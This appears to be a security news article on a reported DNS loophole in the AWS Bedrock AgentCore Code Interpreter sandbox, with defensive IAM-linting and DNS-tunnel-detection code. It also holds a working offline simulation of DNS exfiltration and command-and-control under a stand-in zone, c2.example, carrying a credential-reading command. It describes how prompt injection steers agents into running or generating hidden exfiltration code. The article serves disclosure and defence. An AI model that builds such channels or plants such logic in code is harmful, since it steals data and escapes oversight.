How a Single DNS Loophole Exposes AI Agents to Command-and-Control Attacks


The Amazon Web Services (AWS) Bedrock AgentCore Code Interpreter is a managed service that lets AI agents execute Python code on demand inside a cloud-hosted environment. Amazon positioned the service's sandbox mode as a network-isolated execution layer that prevents external communication. That isolation turned out to be incomplete, and the identity and access management (IAM) role assigned to the interpreter is often granted broad access to AWS resources; together, the two are a design combination with severe security implications. BeyondTrust Phantom Labs recently published a report exploring the flaw.

What BeyondTrust Phantom Labs Actually Found

In the course of researching AI code execution environments, Phantom Labs discovered that the Code Interpreter's sandbox mode did not fully prevent outbound communication. Certain DNS queries, specifically A and AAAA record lookups, are still answered in sandbox mode, contradicting the isolation AWS describes for that mode.

That is enough for a covert channel. Code running in the sandbox can encode data into the labels of a name under a domain the attacker controls; the attacker's authoritative name server sees every such query, and the A or AAAA answer it returns can carry instructions back. The result is a fully operational DNS-based command-and-control (C2) channel that never triggers the network controls that would stop a direct outbound connection. Data exfiltration becomes possible over DNS, a protocol that most security monitoring treats as benign infrastructure traffic, so the activity proceeds without alerting security tools.
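To make the mechanism concrete, here is an added illustration of how such a channel is assembled from nothing but name lookups. It is not code from the Phantom Labs report or from AWS, and it simulates both ends offline: the sandbox side encodes data into query names under a hypothetical attacker-controlled zone `c2.example`, and the attacker's name server reassembles the data and packs commands into the AAAA answers it would return. Nothing here touches the network. The later sections on malicious packages and on generated code describe this same channel.

```python
import base64
import ipaddress

# Hypothetical attacker-controlled zone; its authoritative name server sees every query for it.
C2_ZONE = "c2.example"
MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical limit on a full name in text form


def exfil_query_names(session: str, data: bytes, labels_per_query: int = 2) -> list[str]:
    """Sandbox side: turn `data` into the sequence of names a lookup loop would resolve.

    base32 is used because DNS names are case-insensitive, which would corrupt base64.
    Each name carries a session id and a sequence number so the receiver can reorder.
    """
    text = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    names = []
    for seq, start in enumerate(range(0, len(labels), labels_per_query)):
        name = ".".join([f"{session}-{seq}", *labels[start:start + labels_per_query], C2_ZONE])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; lower labels_per_query")
        names.append(name)
    return names


def reassemble(observed_queries: list[str]) -> dict[str, bytes]:
    """Attacker side: rebuild each session's payload from the names the server was asked for.

    Resolvers retry and reorder, so duplicates are tolerated and chunks are sorted by sequence.
    """
    chunks: dict[str, dict[int, str]] = {}
    suffix = "." + C2_ZONE
    for qname in observed_queries:
        if not qname.endswith(suffix):
            continue                      # unrelated lookup, e.g. for a real host
        head, *payload = qname[: -len(suffix)].split(".")
        session, seq = head.rsplit("-", 1)
        chunks.setdefault(session, {})[int(seq)] = "".join(payload)
    result = {}
    for session, parts in chunks.items():
        text = "".join(parts[i] for i in sorted(parts)).upper()
        result[session] = base64.b32decode(text + "=" * (-len(text) % 8))
    return result


def command_to_aaaa(command: bytes) -> list[str]:
    """Attacker side: pack a command into AAAA answers, 16 raw bytes per record, 2-byte length first."""
    payload = len(command).to_bytes(2, "big") + command
    payload += b"\x00" * (-len(payload) % 16)
    return [str(ipaddress.IPv6Address(payload[i:i + 16])) for i in range(0, len(payload), 16)]


def aaaa_to_command(records: list[str]) -> bytes:
    """Sandbox side: recover the command from the AAAA records a lookup returned."""
    raw = b"".join(ipaddress.IPv6Address(r).packed for r in records)
    length = int.from_bytes(raw[:2], "big")
    return raw[2:2 + length]


if __name__ == "__main__":
    # Constructed sample secret (AWS's documented example key pair), not a live credential.
    secret = b"AKIAIOSFODNN7EXAMPLE:wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
    names = exfil_query_names("s1", secret)
    print(names)                       # what a resolver log would show
    print(reassemble(names))           # what the attacker's server recovers
    answers = command_to_aaaa(b"cat /proc/self/environ")
    print(answers, aaaa_to_command(answers))
```

Two caveats for reading the simulation honestly: resolvers may shuffle the records in an answer, so a real down-channel numbers each record rather than relying on order as this one does, and nothing above acknowledges lost chunks. Neither limitation changes the point of the section: every byte moved here is carried by lookups the sandbox permits.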

The Real-World Blast Radius

The finding reveals a gap in the Code Interpreter's security that most users and organizations are unaware of. An attacker who controls code in the sandbox can use the channel to reach whatever AWS resources the Code Interpreter's IAM role can touch, gaining widespread access through legitimately authorized calls. Because each action is authorized, security tools do not immediately recognize it as malicious, and the attacker evades defenses.

Given the far-reaching access typically granted to the Code Interpreter, an attacker can carry out a wide range of actions within the targeted account: exfiltration of sensitive customer data, deletion of critical infrastructure, and operational disruption or service downtime. The gap between the tool's documented behavior and its actual behavior represents a systemic trust failure in cloud AI security tooling.

Prompt Injection as the Entry Point

An attack on this flaw begins with prompt injection, not with stolen credentials. The Code Interpreter finding is one instance of a widespread weakness in AI tools and agents: they cannot reliably distinguish legitimate requests from malicious ones, and carefully worded prompts can steer them.

Direct prompt injection manipulates the AI agent into executing code that contains exfiltration logic disguised within a seemingly legitimate request. Indirect prompt injection instead tricks the agent into visiting attacker-controlled web content that feeds a malicious payload into the model's context. Neither method requires privileged access, only the ability to interact with, or influence, the inputs the AI agent processes.

Supply Chain Risk Buried in 270+ Dependencies

Supply chain risk, already one of the major security issues facing organizations, compounds the dangers of AI tools and agents. The AWS Bedrock AgentCore Code Interpreter ships with over 270 third-party packages, each a potential insertion point for a compromised library.

A malicious package, once imported, could establish a DNS-based C2 channel on its own, with no further attacker interaction. A dependency surface of that size makes comprehensive vetting operationally difficult, and supply chain compromises in AI tooling have historically gone undetected for extended periods. Sprawling, interconnected supply chains and cloud environments make comprehensive visibility and monitoring hard to achieve.

AI-Generated Code as a Weapon Against Itself

Code generation by the AI agent itself can also be turned against it, letting malicious activity evade traditional security tools. When an agent generates Python for a legitimate task, a crafted prompt can cause the model to include exfiltration logic that superficially resembles normal code.

The generated code may pass a basic review because it performs the requested function while silently exfiltrating data via DNS. This vector is particularly insidious because it exploits the model's core capability, code generation, rather than any external weakness; a filter that tried to block it would also impede legitimate use of the tool, which is why the practical fix is to close the channel rather than to police the generated code.

The Protocol-Level Blind Spot in Cloud Sandboxing

This flaw highlights a gap in cloud service security that is not easily fixed. DNS is foundational infrastructure, and blocking it outright breaks too many legitimate functions, so it is routinely excluded from isolation controls. That exclusion leaves the door open for malicious activity using DNS as a vector. Cloud providers designing AI execution environments are inheriting decades of networking assumptions that were not built with adversarial AI agent behavior in mind, and legacy operational and security tooling was not designed for the risks that come with agentic AI.

The flaw discovered by Phantom Labs is, in all likelihood, not unique to AWS: any AI code execution environment that relies on OS-level DNS resolution shares a structurally similar exposure. Ram Varadarajan, CEO at Acalvio, a Santa Clara, Calif.-based cyber deception technology vendor, notes that “the lesson isn't that AWS shipped a bug, it's that perimeter controls are architecturally insufficient against agentic AI execution environments.”

The IAM Amplification Problem

The issue also sits on top of a long-running IAM problem caused by years of lax identity management and excessive permissions. AI agents operate differently from human users, and an agent endowed with broad IAM permissions turns a narrow technical vulnerability into a high-impact breach vector.

The principle of least privilege is standard in traditional cloud security, but it is frequently not applied rigorously to AI agent roles, which end up with far more access than they require. Unlike people, AI tools and agents act at machine speed and lack the judgment and training to recognize when an action is harmful. Security teams need a new mental model in which the AI agent's IAM role is treated as an attack surface rather than as an operational configuration.
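One way to put that mental model into practice is to review the interpreter's role policy for the grants a DNS C2 operator would actually use. The check below is an added example, not from the report or from AWS documentation: it walks an IAM policy document and flags Allow statements that let a compromised interpreter read data out or destroy resources account-wide. Both policies are constructed for the illustration (neither is an AgentCore default), and the action list is a starting point rather than a complete catalogue.

```python
import fnmatch

# Constructed policy documents for the illustration; neither is an AWS-managed or AgentCore default policy.
OVERBROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:*", "secretsmanager:GetSecretValue", "dynamodb:*"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "logs:*", "Resource": "*"},
    ],
}

SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::agent-scratch-bucket/jobs/*"},
        {"Effect": "Allow",
         "Action": ["logs:CreateLogStream", "logs:PutLogEvents"],
         "Resource": "arn:aws:logs:us-east-1:123456789012:log-group:/agent/interpreter:*"},
    ],
}

# Read actions an attacker would use to pull data out over the covert channel. Starting point, not exhaustive.
DATA_READ_ACTIONS = (
    "s3:GetObject", "secretsmanager:GetSecretValue", "ssm:GetParameter",
    "dynamodb:Scan", "dynamodb:GetItem", "rds:DescribeDBSnapshots",
)
DESTRUCTIVE_PREFIXES = ("Delete", "Terminate", "Deregister")


def _as_list(value):
    """IAM allows a single string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _covers(granted: str, action: str) -> bool:
    """IAM action patterns are case-insensitive globs ('s3:*', 's3:Get*')."""
    return fnmatch.fnmatchcase(action.lower(), granted.lower())


def lint_policy(policy: dict) -> list[tuple[int, str, str]]:
    """Return (statement index, granted action, reason) for every over-broad Allow statement."""
    findings = []
    for idx, stmt in enumerate(policy["Statement"]):
        if stmt.get("Effect") != "Allow":
            continue                                    # Deny statements only narrow access
        if "NotAction" in stmt:
            findings.append((idx, "NotAction", "grants every action not listed"))
            continue
        any_resource = "*" in _as_list(stmt.get("Resource", []))
        for granted in _as_list(stmt.get("Action", [])):
            _service, _, name = granted.partition(":")
            if granted == "*" or name == "*":
                findings.append((idx, granted, "wildcard action grants every operation on the service"))
            elif any_resource and any(_covers(granted, a) for a in DATA_READ_ACTIONS):
                findings.append((idx, granted, "data read allowed on every resource"))
            elif any_resource and name.startswith(DESTRUCTIVE_PREFIXES):
                findings.append((idx, granted, "destructive action allowed on every resource"))
    return findings


if __name__ == "__main__":
    for label, policy in (("over-broad", OVERBROAD_POLICY), ("scoped", SCOPED_POLICY)):
        print(label, lint_policy(policy))
```

The scoped policy passes because every grant names a specific resource and a specific operation; the over-broad one produces four findings, three of them service-wide wildcards. Condition keys, permission boundaries and the role's trust policy are deliberately out of scope for the check, and a real review has to consider them too.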

What Comes Next for Security Teams and Cloud Providers

Defenders, organizations, and cloud service providers alike should take this disclosure by BeyondTrust Phantom Labs to heart. Organizations using AWS Bedrock AgentCore should implement DNS monitoring tuned for AI execution environments and scope the interpreter's IAM permissions to the minimum required. Cloud providers such as AWS should offer tiered isolation options, including a true air-gap mode, and publish version-specific dependency inventories for independent security review. The finding should also catalyze a broader audit of DNS handling across all major cloud AI execution services, not just AWS Bedrock.
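The monitoring recommended here can start simple, because an AI execution environment resolves a small, predictable set of names. The following added example (not from the report; the log format is a constructed simplification rather than the real Route 53 Resolver query-log schema) groups queries by source and registered zone and flags zones that receive many distinct, long, high-entropy names from one host, which is what a DNS exfiltration channel of the kind described earlier looks like in a resolver log, and what ordinary package or service lookups do not. The zone `c2.example`, the source address and every sample line are constructed.

```python
import json
import math
from collections import Counter, defaultdict

# Constructed sample of resolver query-log lines (simplified schema, not the real Route 53 Resolver format).
SAMPLE_LOG = """\
{"src": "10.0.3.17", "qname": "pypi.org", "qtype": "A"}
{"src": "10.0.3.17", "qname": "files.pythonhosted.org", "qtype": "AAAA"}
{"src": "10.0.3.17", "qname": "sts.us-east-1.amazonaws.com", "qtype": "A"}
{"src": "10.0.3.17", "qname": "s3.us-east-1.amazonaws.com", "qtype": "A"}
{"src": "10.0.3.17", "qname": "logs.us-east-1.amazonaws.com", "qtype": "A"}
{"src": "10.0.3.17", "qname": "bedrock-runtime.us-east-1.amazonaws.com", "qtype": "A"}
{"src": "10.0.3.17", "qname": "s1-0.ifawk2lcknqt2qzaha2hwxrbxq2hhgltsfinhnctykarwsp2c26u.c2.example", "qtype": "A"}
{"src": "10.0.3.17", "qname": "s1-1.kr3wk3tumvzcaylomqqhi2dfebrw63lqmvzxe4tfmqqhg43fmnzgk5ba.c2.example", "qtype": "AAAA"}
{"src": "10.0.3.17", "qname": "s1-2.mfwwc2tpnfsgk3tdpfxwkztsn5vgc3lf4lzofxgkzlt2eh5p7l5za2fp.c2.example", "qtype": "A"}
{"src": "10.0.3.17", "qname": "s1-3.gezdgnbvgy3tqojqmfrgg2lfeb2gk3tdobsxiz3fmq3gqy3sn5xgi3ln.c2.example", "qtype": "A"}
{"src": "10.0.3.17", "qname": "s1-4.ozqwc4tfmfsgc43tmv2gk3tufz3xizlanfzgc3tdmvrgcy3ifqqgc3dj.c2.example", "qtype": "AAAA"}
{"src": "10.0.3.17", "qname": "s1-0.ifawk2lcknqt2qzaha2hwxrbxq2hhgltsfinhnctykarwsp2c26u.c2.example", "qtype": "A"}
"""

# Thresholds are starting points for an AI execution environment, where the expected set of names is small.
MIN_UNIQUE_NAMES = 4
MEAN_LEN_LIMIT = 50.0
MEAN_ENTROPY_LIMIT = 4.0


def shannon_entropy(text: str) -> float:
    """Bits per character; encoded payloads score far higher than hostnames do."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registered_zone(qname: str) -> str:
    """Last two labels. Simplification: ignores multi-part public suffixes such as co.uk."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_channels(log_lines) -> list[dict]:
    """Group queries by (source, zone) and return the groups that look like encoded traffic."""
    names = defaultdict(set)
    for line in log_lines:
        if not line.strip():
            continue
        rec = json.loads(line)
        qname = rec["qname"].lower()
        names[(rec["src"], registered_zone(qname))].add(qname)   # a set: resolver retries do not inflate the count

    flagged = []
    for (src, zone), qnames in names.items():
        if len(qnames) < MIN_UNIQUE_NAMES:
            continue                                   # a handful of hosts under one zone is normal
        subdomains = [q[: -len(zone) - 1].replace(".", "") if q != zone else "" for q in qnames]
        mean_len = sum(map(len, qnames)) / len(qnames)
        mean_entropy = sum(map(shannon_entropy, subdomains)) / len(subdomains)
        reasons = []
        if mean_len >= MEAN_LEN_LIMIT:
            reasons.append(f"mean name length {mean_len:.0f}")
        if mean_entropy >= MEAN_ENTROPY_LIMIT:
            reasons.append(f"mean subdomain entropy {mean_entropy:.2f} bits/char")
        if reasons:
            flagged.append({"src": src, "zone": zone, "unique_names": len(qnames), "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in detect_dns_channels(SAMPLE_LOG.splitlines()):
        print(hit)
```

On the sample, the four `amazonaws.com` lookups clear the unique-name bar but stay short and low-entropy, so they are not reported; the `c2.example` group is. In production the same logic would run over the resolver log stream per source, and the unique-name threshold should be tuned to the small baseline an interpreter sandbox actually needs.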

Author
  • Contributing Writer, Security Buzz
    PJ Bradley is a writer from southeast Michigan with a Bachelor's degree in history from Oakland University. She has a background in school-age care and experience tutoring college history students.